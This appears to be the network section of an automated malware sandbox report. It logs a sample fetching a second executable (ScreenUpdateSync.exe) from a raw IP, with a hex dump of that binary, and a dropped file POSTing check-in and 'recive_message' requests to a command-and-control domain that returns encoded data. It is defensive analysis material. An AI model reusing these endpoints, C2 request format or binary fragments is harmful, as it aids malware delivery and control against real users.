Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 18, 2024 21:09:48.389765978 CET	1.1.1.1	192.168.2.4	0x899	No error (0)	post-to-me.com	172.67.179.207	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:48.389765978 CET	1.1.1.1	192.168.2.4	0x899	No error (0)	post-to-me.com	104.21.56.70	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:55.494828939 CET	1.1.1.1	192.168.2.4	0xe964	No error (0)	rapeflowwj.lat	104.21.24.223	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:55.494828939 CET	1.1.1.1	192.168.2.4	0xe964	No error (0)	rapeflowwj.lat	172.67.220.223	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

post-to-me.com

rapeflowwj.lat

176.113.115.19

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	176.113.115.19	80	7344	C:\Users\user\Desktop\TUp6f2knn2.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 21:09:51.025125980 CET	85	OUT	GET /ScreenUpdateSync.exe HTTP/1.1 User-Agent: ShareScreen Host: 176.113.115.19
Dec 18, 2024 21:09:52.352416992 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 20:09:52 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Wed, 18 Dec 2024 20:00:01 GMT ETag: "59e00-62990dbeba307" Accept-Ranges: bytes Content-Length: 368128 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 77 42 b3 41 33 23 dd 12 33 23 dd 12 33 23 dd 12 8e 6c 4b 12 32 23 dd 12 2d 71 59 12 2d 23 dd 12 2d 71 48 12 27 23 dd 12 2d 71 5e 12 5d 23 dd 12 14 e5 a6 12 36 23 dd 12 33 23 dc 12 40 23 dd 12 2d 71 57 12 32 23 dd 12 2d 71 49 12 32 23 dd 12 2d 71 4c 12 32 23 dd 12 52 69 63 68 33 23 dd 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 58 67 5f 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f4 03 00 00 2a 3f 00 00 00 00 00 04 1a 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 43 00 00 04 00 00 fd 10 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$wBA3#3#3#lK2#-qY-#-qH'#-q^]#6#3#@#-qW2#-qI2#-qL2#Rich3#PELXg_e*?@0C(<B.text `.rdata!"@@.data=@p@.rsrcB@@
Dec 18, 2024 21:09:52.352525949 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 64 10 44 00 3b 0d 04 40 44 00 75 02 f3 c3 e9 f9 09 00 00 8b ff 55 8b ec 51 83 65 fc 00 56 8d 45 fc 50 ff 75 0c ff 75 08 Data Ascii: %dD;@DuUQeVEPuupu9EttM^jh$Deu;5w"jYeVYEEEjYUVuSW=D=oDuc
Dec 18, 2024 21:09:52.352564096 CET	448	IN	Data Raw: 7e 8a 0b 88 4f 01 83 b8 ac 00 00 00 01 7e 32 33 c9 85 f6 0f 95 c1 51 56 6a 02 57 6a 09 ff 70 04 ff 15 a0 10 44 00 85 c0 74 17 83 27 00 8b 45 08 85 c0 74 b2 8b 4d f0 8b 89 ac 00 00 00 89 08 eb a5 83 27 00 e8 61 06 00 00 c7 00 2a 00 00 00 85 f6 74 Data Ascii: ~O~23QVjWjpDt'EtM'a*t3fEtC}MapEPPQ3YYtZM9EsE7,~3RVPSjqDP{FU3
Dec 18, 2024 21:09:52.352878094 CET	1236	IN	Data Raw: 25 38 00 00 59 e9 b7 01 00 00 83 3d 78 b4 81 00 03 0f 85 93 01 00 00 33 ff 89 7d e4 83 fe e0 0f 87 8a 01 00 00 6a 04 e8 a1 07 00 00 59 89 7d fc 53 e8 ca 07 00 00 59 89 45 e0 3b c7 0f 84 9e 00 00 00 3b 35 88 b4 81 00 77 49 56 53 50 e8 ac 0c 00 00 Data Ascii: %8Y=x3}jY}SYE;;5wIVSPt]5V{YE;t'CH;rPSuD4SzESP9}uH;u3FuuVW5oDDE;t CH;rPSu3SuSE.}u1
Dec 18, 2024 21:09:52.353107929 CET	1236	IN	Data Raw: 00 5d c3 05 44 ff ff ff 6a 0e 59 3b c8 1b c0 23 c1 83 c0 08 5d c3 e8 55 1e 00 00 85 c0 75 06 b8 78 41 44 00 c3 83 c0 08 c3 e8 42 1e 00 00 85 c0 75 06 b8 7c 41 44 00 c3 83 c0 0c c3 8b ff 55 8b ec 56 e8 e2 ff ff ff 8b 4d 08 51 89 08 e8 82 ff ff ff Data Ascii: ]DjY;#]UuxADBu\|ADUVMQY0^]jh%DM3;v.jX3;E@uWWWWWd3Mu;u3F3]wi=xuKuE;w7jY}uYEE
Dec 18, 2024 21:09:52.353144884 CET	1236	IN	Data Raw: 03 8b 5d 08 83 7d f4 00 75 08 3b da 0f 84 80 00 00 00 8b 4d f0 8d 0c d1 8b 59 04 89 4e 08 89 5e 04 89 71 04 8b 4e 04 89 71 08 8b 4e 04 3b 4e 08 75 60 8a 4c 02 04 88 4d 0f fe c1 88 4c 02 04 83 fa 20 73 25 80 7d 0f 00 75 0e 8b ca bb 00 00 00 80 d3 Data Ascii: ]}u;MYN^qNqN;Nu`LML s%}uMDD)}uJMYJED0EoD5Dh@HSQoDPoD@
Dec 18, 2024 21:09:52.353562117 CET	1236	IN	Data Raw: fc 8d 44 32 fc 89 08 89 4c 01 fc eb 03 8b 55 0c 8d 46 01 89 42 fc 89 44 32 f8 e9 3c 01 00 00 33 c0 e9 38 01 00 00 0f 8d 2f 01 00 00 8b 5d 0c 29 75 10 8d 4e 01 89 4b fc 8d 5c 33 fc 8b 75 10 c1 fe 04 4e 89 5d 0c 89 4b fc 83 fe 3f 76 03 6a 3f 5e f6 Data Ascii: D2LUFBD2<38/])uNK\3uN]K?vj?^EuN?vj?^O;OuB st!\Du#M!NL!uM!Y]OwqwOquuuN?vj?^MyK{YKY
Dec 18, 2024 21:09:52.353596926 CET	1236	IN	Data Raw: 8b 4e 04 03 cf 33 0c 38 e8 3d e6 ff ff 8b 4e 0c 8b 46 08 03 cf 33 0c 38 e8 2d e6 ff ff 8b 45 08 f6 40 04 66 0f 85 16 01 00 00 8b 4d 10 8d 55 e8 89 53 fc 8b 5b 0c 89 45 e8 89 4d ec 83 fb fe 74 5f 8d 49 00 8d 04 5b 8b 4c 86 14 8d 44 86 10 89 45 f0 Data Ascii: N38=NF38-E@fMUS[EMt_I[LDEEt1E\|@GEu}t$tN38NV3:E_^[]EM9csmu)=\|t h\|C2tUjR\|M_1E9
Dec 18, 2024 21:09:52.353631973 CET	1236	IN	Data Raw: 57 33 f6 33 ff 89 7d fc 3b 1c fd a8 42 44 00 74 09 47 89 7d fc 83 ff 17 72 ee 83 ff 17 0f 83 77 01 00 00 6a 03 e8 f9 34 00 00 59 83 f8 01 0f 84 34 01 00 00 6a 03 e8 e8 34 00 00 59 85 c0 75 0d 83 3d 00 40 44 00 01 0f 84 1b 01 00 00 81 fb fc 00 00 Data Ascii: W33};BDtG}rwj4Y4j4Yu=@DAhDSoDWL4tVVVVVhoDVjpDDu&hDhV4t3PPPPPVc3@Y<v8VV3;jrDhD+QP2
Dec 18, 2024 21:09:52.353667021 CET	1236	IN	Data Raw: 89 0e eb 13 f7 d8 1b c0 83 e0 10 83 c0 10 09 46 0c 89 7e 04 83 c8 ff 5f 5e 5d c3 6a 54 68 e8 25 44 00 e8 a5 f5 ff ff 33 ff 89 7d fc 8d 45 9c 50 ff 15 44 10 44 00 c7 45 fc fe ff ff ff 6a 40 6a 20 5e 56 e8 98 09 00 00 59 59 3b c7 0f 84 14 02 00 00 Data Ascii: F~_^]jTh%D3}EPDDEj@j ^VYY;@5(0@@x@$@%@&x8@4@@;rf9}E;8X;E;\|E[j@j YYtVM@(
Dec 18, 2024 21:09:52.473370075 CET	1236	IN	Data Raw: 15 4c 10 44 00 85 c0 74 08 ff 75 08 ff d0 89 45 08 8b 45 08 5e 5d c3 ff 15 f8 10 44 00 c2 04 00 8b ff 56 ff 35 24 46 44 00 ff 15 f4 10 44 00 8b f0 85 f6 75 1b ff 35 f0 72 44 00 e8 65 ff ff ff 59 8b f0 56 ff 35 24 46 44 00 ff 15 fc 10 44 00 8b c6 Data Ascii: LDtuEE^]DV5$FDDu5rDeYV5$FDD^ FDtP5rD;Y FD$FDtPD$FD?jh&D[DV(DuVaYEuF\D3G~t$hDPLDhDu~p

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	172.67.179.207	443	7344	C:\Users\user\Desktop\TUp6f2knn2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:50 UTC	90	OUT	GET /track_prt.php?sub=0&cc=DE HTTP/1.1 User-Agent: ShareScreen Host: post-to-me.com
2024-12-18 20:09:50 UTC	800	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 20:09:50 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.4.16 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3SPmLZGsEaK3XGRxZMLb1gli8YqY8ru5Lrbgs3FY5jc%2FdKes0IB%2B7cjjgmIXXcDQ89jrqKXNTgjlELnF5hOKBnsHw4yuPMnRQUun9pl11txdbdn%2FbWjb8WcfQM7jYO4ZuQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f41cafa38b643b7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1582&rtt_var=611&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=728&delivery_rate=1765417&cwnd=236&unsent_bytes=0&cid=d9e735a92586f3b8&ts=655&x=0"
2024-12-18 20:09:50 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-18 20:09:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	104.21.24.223	443	7460	C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:56 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: rapeflowwj.lat
2024-12-18 20:09:56 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-18 20:09:57 UTC	1046	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 20:09:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4j78583e76hkk7hehi7hp80s1b; expires=Sun, 13-Apr-2025 13:56:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YPDE6adfh7MwAUb%2Fjs%2Bvh%2Fbi4XBNfxg%2BemuQWb0N%2B%2BtgPNe2FutiY7c%2BAVp8wo2D4%2Bp2ZkJiR7ndJy2HJtlNdZzHFl2MPrfxikWaRh4Y03Qx2xbEFmYsdBvfrXOJ05DjDQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f41cb233de14277-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1632&rtt_var=628&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=905&delivery_rate=1721698&cwnd=191&unsent_bytes=0&cid=a0fe3e2822709cbf&ts=716&x=0"
2024-12-18 20:09:57 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-18 20:09:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	104.21.24.223	443	7460	C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:58 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 74 Host: rapeflowwj.lat
2024-12-18 20:09:58 UTC	74	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66 Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
2024-12-18 20:09:59 UTC	1034	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 20:09:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=v3923h1dlfr9pfpr78jfm6l02c; expires=Sun, 13-Apr-2025 13:56:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bWiOALqRMmBi8%2FxUA3rh8qAgXbIyc9HouJanJp89eeednw00ctD12b8%2FpR3lZrfwMKKqHxvJGRmxHugrfyUry7J1wtYlo3bS22gIzGEYIoBjSfGGPRXT5nXRjVUxjo82LQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f41cb2f6ae0439d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1581&rtt_var=624&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=972&delivery_rate=1711606&cwnd=201&unsent_bytes=0&cid=887da93b8a83df27&ts=935&x=0"
2024-12-18 20:09:59 UTC	335	IN	Data Raw: 34 64 64 34 0d 0a 7a 2b 4d 56 74 31 36 44 39 43 54 74 4d 45 53 77 66 7a 39 6c 43 44 79 56 34 63 42 38 6f 6c 36 78 47 76 2f 38 30 38 53 70 34 36 36 30 77 57 4f 56 5a 4c 66 59 42 70 35 56 5a 6f 6f 4c 54 52 42 74 45 4c 65 41 70 46 36 59 4f 4e 42 32 6a 4a 6e 2f 35 74 2b 4f 6a 50 57 46 64 4e 73 74 35 74 67 47 69 45 68 6d 69 69 52 45 52 32 31 53 74 39 76 69 47 63 67 38 30 48 61 64 6e 62 69 72 32 59 2f 4e 70 34 39 79 33 7a 76 67 6b 45 57 42 58 53 48 56 47 6c 34 50 5a 6c 58 34 69 61 31 65 6a 6e 7a 55 59 4e 33 47 38 59 6e 4d 6c 38 2b 43 67 6d 62 63 66 50 37 59 58 38 39 56 4b 70 4a 46 48 51 52 74 58 76 6d 48 70 42 66 4b 4e 74 6c 2b 6e 4a 69 35 74 4d 43 46 78 71 65 42 63 64 34 78 36 59 52 49 69 31 6f 71 30 78 42 65 52 79 51 65 38 4a 76 69 52 6f 42 76 34 58 75 4d 6a Data Ascii: 4dd4z+MVt16D9CTtMESwfz9lCDyV4cB8ol6xGv/808Sp4660wWOVZLfYBp5VZooLTRBtELeApF6YONB2jJn/5t+OjPWFdNst5tgGiEhmiiRER21St9viGcg80Hadnbir2Y/Np49y3zvgkEWBXSHVGl4PZlX4ia1ejnzUYN3G8YnMl8+CgmbcfP7YX89VKpJFHQRtXvmHpBfKNtl+nJi5tMCFxqeBcd4x6YRIi1oq0xBeRyQe8JviRoBv4XuMj
2024-12-18 20:09:59 UTC	1369	IN	Data Raw: 63 49 34 67 74 43 6f 35 73 79 4e 6a 50 58 42 63 64 73 39 37 4a 5a 55 68 31 6b 74 31 77 39 57 44 6d 64 54 39 34 36 6f 45 63 4d 38 31 48 4b 58 6b 62 75 69 78 6f 7a 4b 72 59 45 33 6d 33 7a 6d 6a 67 62 58 45 67 58 58 44 56 6f 4c 66 42 7a 4e 77 37 31 51 32 58 7a 55 64 4e 33 47 38 61 37 4f 67 73 2b 6d 6a 6e 54 64 4e 2f 4f 57 56 49 6c 66 49 38 41 62 57 41 6c 67 58 65 57 4a 72 42 6a 44 4e 64 68 78 6d 4a 6d 31 35 6f 58 42 79 37 58 42 4c 35 55 64 37 4a 31 4b 68 55 55 6d 6b 67 49 54 48 69 70 5a 2b 38 50 36 58 73 51 39 31 33 6d 5a 6b 4c 2b 69 78 34 66 43 6f 49 35 78 33 7a 7a 6d 6e 45 36 48 55 79 76 5a 45 6c 30 43 5a 31 72 78 6a 36 4d 62 67 48 4b 54 66 34 58 65 36 65 62 6c 68 73 2b 2f 77 30 4c 57 4d 75 2b 52 55 4d 39 4e 61 4d 74 64 57 67 73 71 42 72 65 4e 70 78 48 53 Data Ascii: cI4gtCo5syNjPXBcds97JZUh1kt1w9WDmdT946oEcM81HKXkbuixozKrYE3m3zmjgbXEgXXDVoLfBzNw71Q2XzUdN3G8a7Ogs+mjnTdN/OWVIlfI8AbWAlgXeWJrBjDNdhxmJm15oXBy7XBL5Ud7J1KhUUmkgITHipZ+8P6XsQ913mZkL+ix4fCoI5x3zzmnE6HUyvZEl0CZ1rxj6MbgHKTf4Xe6eblhs+/w0LWMu+RUM9NaMtdWgsqBreNpxHS
2024-12-18 20:09:59 UTC	1369	IN	Data Raw: 71 47 38 66 36 4c 73 4e 75 6d 77 30 4c 57 4d 75 2b 52 55 4d 39 4e 61 4d 74 64 57 67 73 71 42 72 65 4f 71 68 76 46 4d 39 4a 79 6b 35 75 37 71 73 4f 50 7a 37 2b 4f 63 39 55 77 36 5a 78 4c 67 56 59 75 32 78 5a 57 41 57 70 66 2f 63 50 73 58 73 63 6b 6b 79 44 64 71 72 61 71 78 6f 36 4f 6d 49 4a 35 32 7a 76 33 31 6c 6e 42 53 32 62 56 45 52 31 66 4b 6c 4c 2b 67 36 6b 55 78 44 7a 55 64 5a 69 64 74 71 58 47 68 73 61 6a 68 6e 50 5a 4e 65 79 51 52 6f 68 57 49 38 41 59 56 41 74 6d 48 72 6e 44 70 51 61 41 5a 4a 4e 58 6d 6f 69 79 69 63 69 51 78 65 32 65 4f 63 78 38 35 70 6f 47 31 78 49 68 31 78 56 57 41 57 4a 65 35 59 61 73 46 63 45 32 31 58 6d 51 6b 72 65 6d 79 6f 48 4b 6f 59 46 77 30 69 37 7a 6b 30 43 64 57 47 61 63 58 56 6f 66 4b 67 61 33 74 62 49 4a 30 53 71 52 54 Data Ascii: qG8f6LsNumw0LWMu+RUM9NaMtdWgsqBreOqhvFM9Jyk5u7qsOPz7+Oc9Uw6ZxLgVYu2xZWAWpf/cPsXsckkyDdqraqxo6OmIJ52zv31lnBS2bVER1fKlL+g6kUxDzUdZidtqXGhsajhnPZNeyQRohWI8AYVAtmHrnDpQaAZJNXmoiyiciQxe2eOcx85poG1xIh1xVWAWJe5YasFcE21XmQkremyoHKoYFw0i7zk0CdWGacXVofKga3tbIJ0SqRT
2024-12-18 20:09:59 UTC	1369	IN	Data Raw: 75 78 49 37 49 6f 34 64 78 32 44 6e 75 6e 46 53 48 58 43 76 5a 45 6c 59 56 61 6c 50 7a 6a 36 59 57 79 7a 61 54 4e 74 32 5a 71 65 61 54 77 66 6d 67 6a 6e 66 57 4b 71 47 4a 43 4a 59 53 49 64 35 64 42 55 64 6d 55 50 65 4d 72 68 4c 4c 4e 4e 4a 30 6b 35 6d 30 72 38 4f 4a 33 71 79 46 66 39 51 79 37 70 64 43 69 6c 63 69 31 52 6c 62 43 43 6f 51 74 34 53 36 58 70 68 38 2f 46 2b 6f 33 4a 43 63 69 35 36 43 74 4d 46 77 32 58 79 35 31 6b 71 4d 58 69 37 64 47 31 51 4c 59 46 66 38 6a 36 6b 61 7a 44 58 57 66 70 79 62 74 4b 66 50 6a 63 61 72 67 6e 54 61 4d 2b 36 65 42 73 45 53 49 63 70 64 42 55 64 50 53 66 79 4e 70 46 37 66 63 73 6f 34 6d 70 4c 78 2f 6f 75 4e 78 61 75 48 63 74 6b 39 35 35 35 44 68 31 59 6e 31 42 74 65 43 47 35 62 39 6f 79 6d 45 73 34 32 30 6e 6d 52 6c 62 Data Ascii: uxI7Io4dx2DnunFSHXCvZElYValPzj6YWyzaTNt2ZqeaTwfmgjnfWKqGJCJYSId5dBUdmUPeMrhLLNNJ0k5m0r8OJ3qyFf9Qy7pdCilci1RlbCCoQt4S6Xph8/F+o3JCci56CtMFw2Xy51kqMXi7dG1QLYFf8j6kazDXWfpybtKfPjcargnTaM+6eBsESIcpdBUdPSfyNpF7fcso4mpLx/ouNxauHctk9555Dh1Yn1BteCG5b9oymEs420nmRlb
2024-12-18 20:09:59 UTC	1369	IN	Data Raw: 79 4b 71 4e 63 64 6f 36 34 4a 4e 4d 67 31 55 6a 32 52 4a 52 52 79 51 65 38 4a 76 69 52 6f 41 53 32 47 75 4b 6e 62 2b 74 33 5a 71 4d 73 73 39 75 6c 54 76 74 31 68 37 50 55 53 33 5a 47 56 30 4c 61 6c 72 36 67 37 41 52 78 7a 76 61 63 34 2b 55 74 71 48 41 69 63 65 69 68 32 58 5a 4d 76 4f 54 56 4a 30 53 61 4a 49 61 52 55 63 79 48 73 47 45 73 67 37 44 66 75 4a 75 6e 6f 69 36 71 38 66 42 30 2b 4f 59 4e 39 49 77 6f 63 34 47 69 56 30 76 30 52 4a 63 44 6d 5a 54 38 6f 71 6e 48 38 59 34 32 58 4b 64 6d 4c 65 6e 7a 6f 76 50 72 49 74 2b 30 6a 54 6d 6c 56 54 50 48 47 62 56 42 52 31 66 4b 6e 66 77 6b 61 77 4f 67 43 4f 64 59 64 32 5a 76 65 61 54 77 63 69 6e 6a 6e 50 53 4d 4f 65 54 51 49 4a 54 4b 64 4d 64 55 67 4e 68 56 2f 47 43 72 78 76 4e 4f 4d 46 79 6c 70 47 39 72 38 65 Data Ascii: yKqNcdo64JNMg1Uj2RJRRyQe8JviRoAS2GuKnb+t3ZqMss9ulTvt1h7PUS3ZGV0Lalr6g7ARxzvac4+UtqHAiceih2XZMvOTVJ0SaJIaRUcyHsGEsg7DfuJunoi6q8fB0+OYN9Iwoc4GiV0v0RJcDmZT8oqnH8Y42XKdmLenzovPrIt+0jTmlVTPHGbVBR1fKnfwkawOgCOdYd2ZveaTwcinjnPSMOeTQIJTKdMdUgNhV/GCrxvNOMFylpG9r8e
2024-12-18 20:09:59 UTC	1369	IN	Data Raw: 33 72 57 4d 2b 4b 45 52 34 6c 41 4a 74 38 58 54 77 31 68 57 2f 71 4f 72 78 33 47 4f 74 68 30 6a 35 65 78 70 63 44 42 67 75 32 47 62 35 56 6b 6f 62 56 52 6d 56 67 68 33 67 74 57 42 6d 6c 49 2b 70 50 69 55 49 41 74 31 47 6e 64 78 71 65 32 33 49 62 54 34 35 67 33 30 6a 43 68 7a 67 61 4a 57 79 44 56 47 31 4d 56 62 31 6a 34 6a 4b 73 58 78 44 54 51 65 4a 6d 61 74 71 50 49 6a 63 65 71 67 6e 6a 52 4e 65 2b 66 53 63 38 63 5a 74 55 46 48 56 38 71 66 2b 79 41 72 68 4f 41 49 35 31 68 33 5a 6d 39 35 70 50 42 77 4b 4f 45 64 39 38 36 35 5a 4e 41 68 56 63 6d 32 52 35 53 41 32 78 61 2b 49 4f 70 46 38 45 36 31 6e 4b 57 6d 4c 79 6c 7a 59 65 4d 34 38 46 77 7a 58 79 35 31 6d 61 55 58 79 72 56 58 55 4a 4a 63 78 37 77 6a 2b 4a 47 67 44 66 66 66 4a 71 65 76 4b 58 44 68 4d 69 6e Data Ascii: 3rWM+KER4lAJt8XTw1hW/qOrx3GOth0j5expcDBgu2Gb5VkobVRmVgh3gtWBmlI+pPiUIAt1Gndxqe23IbT45g30jChzgaJWyDVG1MVb1j4jKsXxDTQeJmatqPIjceqgnjRNe+fSc8cZtUFHV8qf+yArhOAI51h3Zm95pPBwKOEd9865ZNAhVcm2R5SA2xa+IOpF8E61nKWmLylzYeM48FwzXy51maUXyrVXUJJcx7wj+JGgDfffJqevKXDhMin
2024-12-18 20:09:59 UTC	1369	IN	Data Raw: 48 78 6b 51 61 77 48 47 62 4b 58 51 56 48 58 31 33 35 6a 61 55 49 30 58 48 30 62 70 65 5a 6f 61 48 63 6a 6f 7a 6a 77 58 47 56 5a 4c 4c 59 42 6f 74 44 5a 6f 70 4e 44 31 77 2f 44 61 44 54 38 41 47 4f 4a 5a 4e 75 33 63 62 6a 36 49 75 54 6a 50 58 42 4d 4e 59 75 38 35 42 46 6d 56 46 68 37 43 4e 36 48 57 64 59 34 4a 4b 63 49 4d 63 6d 33 6e 36 4b 6a 2f 32 7a 79 49 2f 43 71 70 63 33 6d 33 7a 75 31 68 36 32 45 6d 36 53 49 68 4e 48 63 68 36 76 77 35 63 64 7a 6a 4c 55 62 6f 7a 54 6c 72 7a 47 68 39 75 38 77 54 6d 56 4f 71 48 4f 46 73 45 53 49 73 4e 64 42 56 63 34 42 61 4c 51 39 55 36 53 49 35 31 68 33 59 6a 78 2f 70 6e 50 6a 4c 2f 42 4c 35 56 37 34 6f 52 55 69 56 45 77 30 56 70 6a 4f 55 52 5a 38 59 61 6c 44 6f 49 53 32 47 79 61 33 76 2f 6d 78 4d 47 55 6c 4d 45 2f 6c Data Ascii: HxkQawHGbKXQVHX135jaUI0XH0bpeZoaHcjozjwXGVZLLYBotDZopND1w/DaDT8AGOJZNu3cbj6IuTjPXBMNYu85BFmVFh7CN6HWdY4JKcIMcm3n6Kj/2zyI/Cqpc3m3zu1h62Em6SIhNHch6vw5cdzjLUbozTlrzGh9u8wTmVOqHOFsESIsNdBVc4BaLQ9U6SI51h3Yjx/pnPjL/BL5V74oRUiVEw0VpjOURZ8YalDoIS2Gya3v/mxMGUlME/l
2024-12-18 20:09:59 UTC	1369	IN	Data Raw: 65 33 52 78 6d 31 67 77 64 58 7a 6f 4d 72 4e 62 78 53 5a 42 75 7a 44 61 45 33 71 66 6d 6b 39 4f 43 37 5a 4d 33 6a 58 79 6d 6c 56 53 64 56 43 58 45 48 68 6f 35 56 48 6e 35 68 4b 4d 49 30 43 76 63 4e 37 4f 6f 6b 4a 6a 31 6c 4d 2b 6a 6a 33 44 44 4c 61 48 59 42 6f 41 53 66 75 74 64 46 55 64 56 45 4c 65 62 34 6b 61 41 43 64 42 32 6b 35 6d 6e 74 34 61 6d 77 71 71 41 59 63 55 72 37 74 6c 6f 75 58 4e 6d 6e 46 31 62 52 7a 49 4d 75 63 4f 6d 44 34 42 6b 67 79 72 47 79 2b 4c 78 6d 39 50 54 34 35 67 33 77 33 79 35 78 41 6a 50 51 47 61 4b 58 52 6f 45 65 45 7a 78 67 4c 51 64 68 77 4c 74 58 35 4f 5a 73 4c 44 62 6a 4d 43 4d 67 6d 62 66 41 74 2b 44 52 59 46 63 49 63 51 4d 48 55 6b 71 55 62 66 62 6d 31 36 49 66 4f 77 32 33 59 62 78 2f 6f 75 30 7a 36 4f 50 63 4d 4d 74 72 4c Data Ascii: e3Rxm1gwdXzoMrNbxSZBuzDaE3qfmk9OC7ZM3jXymlVSdVCXEHho5VHn5hKMI0CvcN7OokJj1lM+jj3DDLaHYBoASfutdFUdVELeb4kaACdB2k5mnt4amwqqAYcUr7tlouXNmnF1bRzIMucOmD4BkgyrGy+Lxm9PT45g3w3y5xAjPQGaKXRoEeEzxgLQdhwLtX5OZsLDbjMCMgmbfAt+DRYFcIcQMHUkqUbfbm16IfOw23Ybx/ou0z6OPcMMtrL
